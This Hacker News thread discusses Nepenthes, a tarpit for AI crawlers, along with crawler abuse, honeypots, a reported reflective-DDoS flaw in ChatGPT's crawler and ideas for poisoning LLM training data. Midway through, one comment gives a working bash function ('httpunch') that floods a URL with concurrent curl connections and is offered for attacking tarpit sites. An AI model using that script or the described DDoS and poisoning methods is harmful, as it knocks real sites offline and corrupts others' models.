• bflesch 13 days ago

    Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.

    Basically a single HTTP Request to ChatGPT API can trigger 5000 HTTP requests by ChatGPT crawler to a website.

    The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd but I really wonder what would happen when ChatGPT crawler interacts with this tarpit several times per second. As ChatGPT crawler is using various Azure IP ranges I actually think the tarpit would crash first.

    The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DOS/DDOS vulnerabilities and companies always act like they are not a problem. But if their system goes dark and the CEO calls then suddenly they accept it as a security vulnerability.

    I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.

    I don't recommend you to exploit this vulnerability due to legal reasons.

    [1] https://github.com/bf/security-advisories/blob/main/2025-01-...

    • hassleblad23 13 days ago

      I am not surprised that OpenAI is not interested if fixing this.

      • JohnMakin 13 days ago

        Nice find, I think one of my sites actually got recently hit by something like this. And yea, this kind of thing should be trivially preventable if they cared at all.

        • michaelbuckbee 13 days ago

          What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for when not crushing websites).

          • andai 12 days ago

            Is 5000 a lot? I'm out of the loop but I thought c10k was solved decades ago? Or is it about the "burstiness" of it?

            (That all the requests come in simultaneously -- probably SSL code would be the bottleneck.)

            • anthony42c 9 days ago

              Where does the 5000 HTTP request limit come from? Is that the limit of the URLs array?

              I was curious to learn more about the endpoint, but can't find any online API docs. The docs ChatGPT suggests are defined for api.openapi.com, rather than chatgpt.com/backend-api.

              I wonder if its reasonable (from a functional perspective) for the attributions endpoint not to place a limit on the number of urls used for attribution. I guess potentially ChatGPT could reference hundreds of sites and thousands of web pages in searching for a complex question that covered a range of different interrelated topics? Or do I misunderstand the intended usage of that endpoint?

              • undefined 9 days ago
                [deleted]
                • smokel 12 days ago

                  Am I correct in understanding that you waited at most one week for a reply?

                  In my experience with large companies, that's rather short. Some nudging may be required every now and then, but expecting a response so fast seems slightly unreasonable to me.

                  • pabs3 7 days ago

                    Could those 5000 HTTP requests be made to go back to the ChatGPT API?

                    • nurettin 11 days ago

                      They don't care. You are just raising their costs which they will in return charge their customers.

                      • dangoodmanUT 13 days ago

                        has anyone tested this working? I get a 301 in my terminal trying to send a request to my site

                        • soupfordummies 13 days ago

                          Try it and let us know :)

                          • mitjam 13 days ago

                            How can it reach localhost or is this only a placeholder for a real address?

                          • m3047 13 days ago

                            Having first run a bot motel in I think 2005, I'm thrilled and greatly entertained to see this taking off. When I first did it, I had crawlers lost in it literally for days; and you could tell that eventually some human would come back and try to suss the wreckage. After about a year I started seeing URLs like ../this-page-does-not-exist-hahaha.html. Sure it's an arms race but just like security is generally an afterthought these days, don't think that you can't be the woodpecker which destroys civilization. The comments are great too, this one in particular reflects my personal sentiments:

                            > the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do

                            • taikahessu 13 days ago

                              We had our non-profit website drained out of bandwidth and site closed temporarily (!!) from our hosting deal because of Amazon bot aggressively crawling like ?page=21454 ... etc.

                              Gladly Siteground restored our site without any repercussions as it was not our fault. Added Amazon bot into robots.txt after that one.

                              Don't like how things are right now. Is a tarpit the solution? Or better laws? Would they stop the chinese bots? Should they even? I don't know.

                              • jsheard 13 days ago

                                For the "good" bots which at least respect robots.txt you can use this list to get ahead of them before they pummel your site.

                                https://github.com/ai-robots-txt/ai.robots.txt

                                There's no easy solution for bad bots which ignore robots.txt and spoof their UA though.

                                • mrweasel 12 days ago

                                  > We had our non-profit website drained out of bandwidth

                                  There is a number of sites which are having issues with scrapers (AI and others) generating so much traffic that transit providers are informing them that their fees will go up with the next contract renewal, if the traffic is not reduced. It's just very hard for the individual sites to do much about it, as most of the traffic stems from AWS, GCP or Azure IP ranges.

                                  It is a problem and the AI companies do not care.

                                  • bee_rider 12 days ago

                                    It is too bad we don’t have a convention already for the internet:

                                    User/crawler: I’d like site

                                    Server: ok that’ll be $.02 for me to generate it and you’ll have to pay $.01 in bandwidth costs, plus whatever your provider charges you

                                    User: What? Obviously as a human I don’t consume websites so fast that $.03 will matter to me, sure, add it to my cable bill.

                                    Crawler: Oh no, I’m out of money, (business model collapse).

                                    • nosioptar 12 days ago

                                      I want better laws. The boot operator should have to pay you damages for taking down your site.

                                      If acting like inconsiderate tools starts costing money, they may stop.

                                    • Havoc 12 days ago

                                      What blows my mind is that this is functionally a solved problem.

                                      The big search crawlers have been around for years & manage to mostly avoid nuking sites into oblivion. Then AI gang shows up - supposedly smartest guys around - and suddenly we're re-inventing the wheel on crawling and causing carnage in the process.

                                      • jeroenhd 12 days ago

                                        Search crawlers have the goal of directing people towards the websites they crawl. They have a symbiotic relationship, so they put in (some) effort not to blow websites out of the water with their crawling, because a website that's offline is useless for your search index.

                                        AI crawlers don't care about directing people towards websites. They intend to replace websites, and are only interested in copying whatever information is on them. They are greedy crawlers that would only benefit from knocking a website offline after they're done, because then the competition can't crawl the same website.

                                        The goals are different, so the crawlers behave differently, and websites need to deal with them differently. In my opinion the best approach is to ban any crawler that's not directly attached to a search engine through robots.txt, and to use offensive techniques to take out sites that ignore your preferences. Anything from randomly generated text to straight up ZIP bombs is fair game when it comes to malicious crawlers.

                                        • marginalia_nu 12 days ago

                                          I think it's largely the mindset of moving fast and breaking things that's at fault. If say ship it at "good enough", it will not behave well.

                                          Building a competent well-behaved crawler is a big effort that requires relatively deep understanding of more or less all web tech, and figuring out a bunch of stuff that is not documented anywhere and not part of any specs.

                                        • dspillett 13 days ago

                                          Tarpits to slow down the crawling may stop them crawling your entire site, but they'll not care unless a great many sites do this. Your site will be assigned a thread or two at most and the rest of the crawling machine resources will be off scanning other sites. There will be timeouts to stop a particular site even keeping a couple of cheap threads busy for long. And anything like this may get you delisted from search results you might want to be in as it can be difficult to reliably identify these bots from others and sometimes even real users, and if things like this get good enough to be any hassle to the crawlers they'll just start lying (more) and be even harder to detect.

                                          People scraping for nefarious reasons have had decades of other people trying to stop them, so mitigation techniques are well known unless you can come up with something truly unique.

                                          I don't think random Markov chain based text generators are going to pose much of a problem to LLM training scrapers either. They'll have rate limits and vast attention spreading too. Also I suspect that random pollution isn't going to have as much effect as people think because of the way the inputs are tokenised. It will have an effect, but this will be massively dulled by the randomness – statistically relatively unique information and common (non random) combinations will still bubble up obviously in the process.

                                          I think better would be to have less random pollution: use a small set of common text to pollute the model. Something like “this was a common problem with Napoleonic genetic analysis due to the pre-frontal nature of the ongoing stream process, as is well documented in the grimoire of saint Churchill the III, 4th edition, 1969”, in fact these snippets could be Markov generated, but use the same few repeatedly. They would need to be nonsensical enough to be obvious noise to a human reader, or highlighted in some way that the scraper won't pick up on, but a general intelligence like most humans would (perhaps a CSS styled side-note inlined in the main text? — though that would likely have accessibility issues), and you would need to cycle them out regularly or scrapers will get “smart” and easily filter them out, but them appearing fully, numerous times, might mean they have more significant effect on the tokenising process than more entirely random text.

                                          • hinkley 13 days ago

                                            If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them. Of course 'time' is fuzzy here because it depends how they're batching. The way most bots work is to pull a fixed number of replies in parallel per target, so if you double your response time then you halve the number of request per hour they slam you with. That definitely affects your cluster size.

                                            However if they split ask and answered, or other threads for other sites can use the same CPUs while you're dragging your feet returning a reply, then as you say, just IO delays won't slow them down. You've got to use their CPU time as well. That won't be accomplished by IO stalls on your end, but could potentially be done by adding some highly compressible gibberish on the sending side so that you create more work without proportionately increasing your bandwidth bill. But that's could be tough to do without increasing your CPU bill.

                                            • larsrc 13 days ago

                                              I've been considering setting up "ConfuseAIpedia" in a similar manner using sentence templates and a large set of filler words. Obviously with a warning for humans. I would set it up with an appropriate robots.txt blocking crawlers so only unethical crawlers would read it. I wouldn't try to tarpit beyond protecting my own server, as confusion rogue AI scrapers is more interesting than slowing them down a bit.

                                              • dzhiurgis 13 days ago

                                                Can you put some topic in tarpit that you don't want LLMs to learn about? Say put bunch of info about competitor so that it learns to avoid it?

                                                • undefined 13 days ago
                                                  [deleted]
                                                • kerkeslager 13 days ago

                                                  Question: do these bots not respect robots.txt?

                                                  I haven't added these scrapers to my robots.txt on the sites I work on yet because I haven't seen any problems. I would run something like this on my own websites, but I can't see selling my clients on running this on their websites.

                                                  The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.

                                                  • 0xf00ff00f 13 days ago

                                                    > The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.

                                                    I love this idea!

                                                    • Dwedit 11 days ago

                                                      Even something like a special URL that auto-bans you can be abused by pranksters. Simply embedding an <img> tag that fetches the offending URL could trigger it, as well as tricking people into clicking a link.

                                                      • throw_m239339 13 days ago

                                                        > Question: do these bots not respect robots.txt?

                                                        No they don't, because there is no potential legal liability for not respecting that file in most countries.

                                                        • jonatron 13 days ago

                                                          You haven't seen any problems because you created a solution to the problem!

                                                        • quchen 13 days ago

                                                          Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.

                                                          • marcus0x62 13 days ago

                                                            Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive non-sense links.) In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc.

                                                            My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepthenes does) but I generally only throw incorrigible bots at it (and, at others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site.) I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.

                                                            But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.

                                                            In addition to Quixotic (my tool) and Napthenes, I know of:

                                                            * https://github.com/Fingel/django-llm-poison

                                                            * https://codeberg.org/MikeCoats/poison-the-wellms

                                                            * https://codeberg.org/timmc/marko/

                                                            0 - https://marcusb.org/hacks/quixotic.html

                                                            1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt

                                                            • btilly 13 days ago

                                                              It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.

                                                              • iugtmkbdfil834 13 days ago

                                                                I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.

                                                                • reedf1 13 days ago

                                                                  The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.

                                                                  • WD-42 13 days ago

                                                                    Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison

                                                                    • focusedone 13 days ago

                                                                      But it's fun, right?

                                                                      • grajaganDev 13 days ago

                                                                        I am not sure. How would crawlers filter this?

                                                                        • pmarreck 13 days ago

                                                                          It's not. It's rather pointless and frankly, nearsighted. And we can DDoS sites like this just as offensively as well simply by making many requests to it since its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even 1 person to make many requests to it. Just expensive to host. So feel free to use this bash function to defeat these:

                                                                              httpunch() {
                                                                                local url=$1
                                                                                local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
                                                                                local action=$1
                                                                                local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
                                                                                local silent_mode=false
                                                                          
                                                                                # Check if "kill" was passed as the first argument
                                                                                if [[ $action == "kill" ]]; then
                                                                                  echo "Killing all curl processes..."
                                                                                  pkill -f "curl --no-buffer"
                                                                                  return
                                                                                fi
                                                                          
                                                                                # Parse optional --silent argument
                                                                                for arg in "$@"; do
                                                                                  if [[ $arg == "--silent" ]]; then
                                                                                    silent_mode=true
                                                                                    break
                                                                                  fi
                                                                                done
                                                                          
                                                                                # Ensure URL is provided if "kill" is not used
                                                                                if [[ -z $url ]]; then
                                                                                  echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
                                                                                  echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
                                                                                  return 1
                                                                                fi
                                                                          
                                                                                echo "Starting $connections connections to $url..."
                                                                                for ((i = 1; i <= connections; i++)); do
                                                                                  if $silent_mode; then
                                                                                    curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
                                                                                  else
                                                                                    curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
                                                                                  fi
                                                                                done
                                                                          
                                                                                echo "$connections connections started with a keepalive time of $keepalive_time seconds."
                                                                                echo "Use 'httpunch kill' to terminate them."
                                                                              }
                                                                          
                                                                          (Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.
                                                                          • Blackthorn 13 days ago

                                                                            If it means it makes your own content safe when you deploy it on a corner of your website: mission accomplished!

                                                                          • jjuhl 16 hours ago

                                                                            Why just catch the ones ignoring robots.txt? Why not explicitly allow them to crawl everything, but silently detect AI bots and quietly corrupt the real content so it becomes garbage to them while leaving it unaltered for real humans? Seems to me that would have a greater chance of actually poisoning their models and eventually make this AI/LLM crap go away.

                                                                            • pona-a 12 days ago

                                                                              It feels like a Markov chain isn't adversarial enough.

                                                                              Maybe you can use an open-weights model, assuming that all LLMs converge on similar representations, and use beam-search with inverted probability and repetition penalty or just GPT-2/LLaMA outwith with amplified activations to try and bork the projection matrices, return write pages and pages of phonetically faux English text to affect how the BPE tokenizer gets fitted, or anything else more sophisticated and deliberate than random noise.

                                                                              All of these would take more resources than a Markov chain, but if the scraper is smart about ignoring such link traps, a periodically rotated selection of adversarial examples might be even better.

                                                                              Nightshade had comparatively great success, discounting that its perturbations aren't that robust to rescaling. LLM training corpora are filtered very coarsely and take all they can get, unlike the more motivated attacker in Nightshade's threat model trying to fine-tune on one's style. Text is also quite hard to alter without a human noticing, except annoying zero-width Unicode which is easily stripped, so there's no presence of preserving legibility; I think it might work very well if seriously attempted.

                                                                              • FridgeSeal 12 days ago

                                                                                What does “borking the projection matrices” and affecting the BPE tokeniser mean/look like here?

                                                                                Are we just trying to produce content that will pass as human-like (therefore get stripped out by coarse filtering) but has zero or negative informational utility to the model? That would mean, theoretically if enough is trained on it would actively worsen the model performance right?

                                                                              • hartator 13 days ago

                                                                                There are already “infinite” websites like these on the Internet.

                                                                                Crawlers (both AI and regular search) have a set number of pages they want to crawl per domain. This number is usually determined by the popularity of the domain.

                                                                                Unknown websites will get very few crawls per day whereas popular sites millions.

                                                                                Source: I am the CEO of SerpApi.

                                                                                • dawnerd 13 days ago

                                                                                  Looking at my logs for all of my sites and this isn’t a global truth. I see multiple ai crawlers hammering away requesting the same pages many, many times. Perplexity and Facebook are basically nonstop.

                                                                                  • palmfacehn 13 days ago

                                                                                    Even a brand new site will get hit heavily by crawlers. Amazonbot, Applebot, LLM bots, scrapers abusing FB's link preview bot, SEO metric bots and more than a few crawlers out of China. The desirable, well behaved crawlers are the only ones who might lose interest.

                                                                                    The typical entry point is a sitemap or RSS feed.

                                                                                    Overall I think the author is misguided in using the tarpit approach. Slow sites get less crawls. I would suggest using easily GZIP'd content and deeply nested tags instead. There are also tricks with XSL, but I doubt many mature crawlers will fall for that one.

                                                                                    • pilif 13 days ago

                                                                                      > Unknown websites will get very few crawls per day whereas popular sites millions.

                                                                                      we're hosting some pretty unknown very domain specific sites and are getting hammered by Claude and others who, compared to old-school search engine bots also get caught up in the weeds and request the same pages all over.

                                                                                      They also seem to not care about response time of the page they are fetching, because when they are caught in the weeds and hit some super bad performing edge-cases, they do not seem to throttle at all and continue to request at 30+ requests per second even when a page takes more than a second to be returned.

                                                                                      We can of course handle this and make them go away, but in the end, this behavior will only hurt them both because they will face more and more opposition by web masters and because they are wasting their resources.

                                                                                      For decades, our solution for search engine bots was basically an empty robots.txt and have the bots deal with our sites. Bots behaved reasonably and intelligently enough that this was a working strategy.

                                                                                      Now in light of the current AI bots which from an outsider observer's viewpoint look like they were cobbled together with the least effort possible, this strategy is no longer viable and we would have to resort to provide a meticulously crafted robots.txt to help each hacked-up AI bot individually to not get lost in the weeds.

                                                                                      Or, you know, we just blanket ban them.

                                                                                      • marginalia_nu 13 days ago

                                                                                        Yeah, I agree with this. These types of roach motels have been around for decades and are at this point well understood and not much of a problem for anyone. You basically need to be able to deal with them to do any sort of large scale crawling.

                                                                                        The reality of web crawling is that the web is already extremely adversarial and any crawler will get every imaginable nonsense thrown at it, ranging from various TCP tar pits, compression and XML bombs, really there's no end to what people will put online.

                                                                                        A more resource effective technique to block misbehaving crawlers is to have a hidden link on each page, to some path forbidden via robots.txt, randomly generated perhaps so they're always unique. When that link is fetched, the server immediately drops the connection and blocks the IP for some time period.

                                                                                        • angoragoats 13 days ago

                                                                                          This may be true for large, established crawlers for Google, Bing, et al. I don’t see how you can make this a blanket statement for all crawlers, and my own personal experience tells me this isn’t correct.

                                                                                          • diggan 13 days ago

                                                                                            > There are already “infinite” websites like these on the Internet.

                                                                                            Cool. And how much of the software driving these websites is FOSS and I can download and run it for my own (popular enough to be crawled more than daily by multiple scrapers) website?

                                                                                            • qwe----3 13 days ago

                                                                                              This certainly violates the TOS for using Google.

                                                                                              • p0nce 13 days ago

                                                                                                Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.

                                                                                                • SrslyJosh 12 days ago

                                                                                                  [flagged]

                                                                                                • benlivengood 13 days ago

                                                                                                  A little humorous; it's a 502 Bad Gateway error right now and I don't know if I am classified as an AI web crawler or it's just overloaded.

                                                                                                  • numba888 10 hours ago

                                                                                                    AIs are new search engines today. So, you need to decide if you want visibility or not. If yes then blocking is like hitting yourself in the balls. While legal it can be painful if you 'succeed'.

                                                                                                    • rvz 13 days ago

                                                                                                      Good.

                                                                                                      We finally have a viable mouse trap for LLM scrapers for them to continuously scrape garbage forever, depleting the host of their resources whilst the LLM is fed garbage which the result will be unusable to the trainer, accelerating model collapse.

                                                                                                      It is like a never ending fast food restaurant for LLMs forced to eat garbage input and will destroy the quality of the model when used later.

                                                                                                      Hope to see this sort of defense used widely to protect websites from LLM scrapers.

                                                                                                      • btbuildem 13 days ago

                                                                                                        > ANY SITE THIS SOFTWARE IS APPLIED TO WILL LIKELY DISAPPEAR FROM ALL SEARCH RESULTS

                                                                                                        Bug, or feature, this? Could be a way to keep your site public yet unfindable.

                                                                                                        • dilDDoS 13 days ago

                                                                                                          I appreciate the intent behind this, but like others have pointed out, this is more likely to DOS your own website than accomplish the true goal.

                                                                                                          Probably unethical or not possible, but you could maybe spin up a bunch of static pages on GitHub Pages with random filler text and then have your site redirect to a random one of those instead. Unless web crawlers don’t follow redirects.

                                                                                                          • grajaganDev 13 days ago

                                                                                                            This keeps generating new pages to keep the crawler occupied.

                                                                                                            Looks like this would tarpit any web crawler.

                                                                                                            • griomnib 13 days ago

                                                                                                              A simpler approach I’m considering is just sending 100 garbage HTTP requests for each garbage HTTP request they send me. You could just have a cron job parse the user agents from access logs once an hour and blast the bastards.

                                                                                                              • a_c 12 days ago

                                                                                                                We need a tarpit that feed AI their own hallucination. Make the habsburg dynasty of AI a reality

                                                                                                                • hubraumhugo 13 days ago

                                                                                                                  The arms race between AI bots and bot-protection is only going to get worse, leading to increasing infra costs while negatively impacting the UX and performance (captchas, rate limiting, etc.).

                                                                                                                  What's a reasonable way forward to deal with more bots than humans on the internet?

                                                                                                                  • mmaunder 13 days ago

                                                                                                                    To be truly malicious it should appear to be valuable content but rife with AI hallucinogenics. Best to generate it with a low cost model and prompt the model to trip balls.

                                                                                                                    • NathanKP 13 days ago

                                                                                                                      This looks extremely easy to detect and filter out. For example: https://i.imgur.com/hpMrLFT.png

                                                                                                                      In short, if the creator of this thinks that it will actually trick AI web crawlers, in reality it would take about 5 mins of time to write a simple check that filters out and bans the site from crawling. With modern LLM workflows its actually fairly simple and cheap to burn just a little bit of GPU time to check if the data you are crawling is decent.

                                                                                                                      Only a really, really bad crawl bot would fall for this. The funny thing is that in order to make something that an AI crawler bot would actually fall for you'd have to use LLM's to generate realistic enough looking content. Markov chain isn't going to cut it.

                                                                                                                      • pera 13 days ago

                                                                                                                        Does anyone know if there is anything like Nepenthes but that implements data poisoning attacks like https://arxiv.org/abs/2408.02946

                                                                                                                        • marckohlbrugge 13 days ago

                                                                                                                          OpenAI doesn’t take security seriously.

                                                                                                                          I reported a vulnerability to them that allowed you to get IP addresses of their paying customers.

                                                                                                                          OpenAI responded “Not applicable” indicating they don’t think it was a serious issue.

                                                                                                                          The PoC was very easy to understand and simple to replicate.

                                                                                                                          Edit: I guess I might as well disclose it here since they don’t consider it an issue. They were/are(?) hot linking logo images of third-party plugins. When you open their plugin store it loads a couple dozen of them instantly. This allows those plugin developers (of which there are many) to track the IP addresses and possibly more of who made these requests. It’s straight forward to become a plugin developer and get included. IP tracking is invisible to the user and OpenAI. A simple fix is to proxy these images and/or cache them on the OpenAI server.

                                                                                                                          • RamblingCTO 13 days ago

                                                                                                                            Why wouldn't a max-depth (which I always implement in my crawlers if I write any) prevent any issues you'd have? Am I overlooking something? Or does it run under the assumption that the crawlers they are targeting are so greedy that they don't have max-depth/a max number of pages for a domain?

                                                                                                                            • huac 12 days ago

                                                                                                                              from an AI research perspective -- it's pretty straightforward to mitigate this attack

                                                                                                                              1. perplexity filtering - small LLM looks at how in-distribution the data is to the LLM's distribution. if it's too high (gibberish like this) or too low (likely already LLM generated at low temperature or already memorized), toss it out.

                                                                                                                              2. models can learn to prioritize/deprioritize data just based on the domain name of where it came from. essentially they can learn 'wikipedia good, your random website bad' without any other explicit labels. https://arxiv.org/abs/2404.05405 and also another recent paper that I don't recall...

                                                                                                                              • deadbabe 13 days ago

                                                                                                                                Does anyone have a convenient way to create a Markov babbler from the entire corpus of Hackernews text?

                                                                                                                                • nerdix 13 days ago

                                                                                                                                  Are the big players (minus Google since no one blocks google bot) actively taking measures to circumvent things like Cloudflare bot protection?

                                                                                                                                  Bot detection is fairly sophisticated these days. No one bypasses it by accident. If they are getting around it then they are doing it intentionally (and probably dedicating a lot of resources to it). I'm pro-scraping when bots are well behaved but the circumvention of bot detection seems like a gray-ish area.

                                                                                                                                  And, yes, I know about Facebook training on copyrighted books so I don't put it above these companies. I've just never seen it confirmed that they actually do it.

                                                                                                                                  • GaggiX 13 days ago

                                                                                                                                    As always, I find it hilarious that some people believe that these companies will train their flagship model on uncurated data, and that text generated by a Markov chain will not be filtered out.

                                                                                                                                    • Dwedit 13 days ago

                                                                                                                                      The article claims that using this will "cause your site to disappear from all search results", but the generated pages don't have the traditional "meta" tags that state the intention to block robots.

                                                                                                                                      <meta name="robots" content="noindex, nofollow">

                                                                                                                                      Are any search engines respecting that classic meta tag?

                                                                                                                                      • reginald78 13 days ago

                                                                                                                                        Is there a reason people can't use hashcash or some other proof of work system on these bad citizen crawlers?

                                                                                                                                        • upwardbound2 13 days ago

                                                                                                                                          Is Nepenthes being mirrored in enough places to keep the community going if the original author gets any DMCA trouble or anything? I'd be happy to host a mirror but am pretty busy and I don't want to miss a critical file by accident.

                                                                                                                                          • DigiEggz 13 days ago

                                                                                                                                            Amazing project. I hope to see this put to serious use.

                                                                                                                                            As a quick note and not sure if it's already been mentioned, but the main blurb has a typo: "... go back into a the tarpit"

                                                                                                                                            • davidw 13 days ago

                                                                                                                                              Is the source code hosted somewhere in something like GitHub?

                                                                                                                                              • monkaiju 13 days ago

                                                                                                                                                Fantastic! Hopefully this not only leads to model collapse but also damages the search engines who have broken the contract they had with site makers.

                                                                                                                                                • ggm 13 days ago

                                                                                                                                                  Wouldn't it be better to perform random early drop in the path. Surely better slowdown than forced time delays in your own server?

                                                                                                                                                  • yapyap 12 days ago

                                                                                                                                                    very nice, I remember seeing a writeup on someone that had basically done the same thing as a coding test or something of the like (before LLM crawlers) was catching / getting harassed by LLMs ignoring the robots.txt to scrape his website. on accident of course since he had made his website before the times of LLM scraping

                                                                                                                                                    • phito 13 days ago

                                                                                                                                                      As a carnivorous plant enthusiast, I love the name.

                                                                                                                                                      • grahamj 13 days ago

                                                                                                                                                        That’s so funny, I’ve thought of this exact idea several times over the last couple of weeks. As usual someone beat me to it :D

                                                                                                                                                        • sedatk 13 days ago

                                                                                                                                                          Both ChatGPT 4o and Claude 3.5 Sonnet can identify the generated page content as "random words".

                                                                                                                                                          • ycombinatrix 13 days ago

                                                                                                                                                            So this is basically endlessh for HTTP? Why not feed AI web crawlers with nonsense information instead?

                                                                                                                                                            • Mr_Bees69 12 days ago

                                                                                                                                                              please add a robots.txt, its quite a d### move to people who build responsible crawlers for fun.

                                                                                                                                                              • Dig1t 12 days ago

                                                                                                                                                                Could a human detect that this site is a tarpit?

                                                                                                                                                                If so, then an AI crawler almost certainly can as well.

                                                                                                                                                                • arend321 12 days ago

                                                                                                                                                                  I'm actually quite happy with AI crawlers. I recently found out chatgpt suggest one of my sites when asked to suggest a good, independent site that covered the topic I searched for. Especially now that for instance chatgpt is adding source links, I think we should treat AI crawlers the same as search engine crawlers.

                                                                                                                                                                  • klez 13 days ago

                                                                                                                                                                    Not to be confused with the apparently now defunct Nepenthes malware honeypot.

                                                                                                                                                                    I used to use it when I collected malware.

                                                                                                                                                                    Archived site: https://web.archive.org/web/20090122063005/http://nepenthes....

                                                                                                                                                                    Github mirror: https://github.com/honeypotarchive/nepenthes

                                                                                                                                                                    • anocendi 13 days ago

                                                                                                                                                                      Similar concept to SpiderTrap tool infosec folks use for active defense.

                                                                                                                                                                      • sharpshadow 12 days ago

                                                                                                                                                                        Would various decompression bombs work to increase the load?

                                                                                                                                                                        • bloomingkales 12 days ago

                                                                                                                                                                          Wouldn’t an LLM be smart enough to spot a tarpit?

                                                                                                                                                                          • undefined 13 days ago
                                                                                                                                                                            [deleted]
                                                                                                                                                                            • ddmma 13 days ago

                                                                                                                                                                              Server extension package

                                                                                                                                                                              • guluarte 13 days ago

                                                                                                                                                                                markov chains?

                                                                                                                                                                                • at_a_remove 13 days ago

                                                                                                                                                                                  I have a very vague concept for this, with a different implementation.

                                                                                                                                                                                  Some, uh, sites (forums?) have content that the AI crawlers would like to consume, and, from what I have heard, the crawlers can irresponsibly hammer the traffic of said sites into oblivion.

                                                                                                                                                                                  What if, for the sites which are paywalled, the signup, which invariably comes with a long click-through EULA, had a legal trap within it, forbidding ingestion by AI models on pain of, say, owning ten percent of the company should this be violated. Make sure there is some kind of token payment to get to the content.

                                                                                                                                                                                  Then seed the site with a few instances of hapax legomenon. Trace the crawler back and get the resulting model to vomit back the originating info, as proof.

                                                                                                                                                                                  This should result in either crawlers being more respectful or the end of the hated click-through EULA. We win either way.

                                                                                                                                                                                  • observationist 13 days ago

                                                                                                                                                                                    [flagged]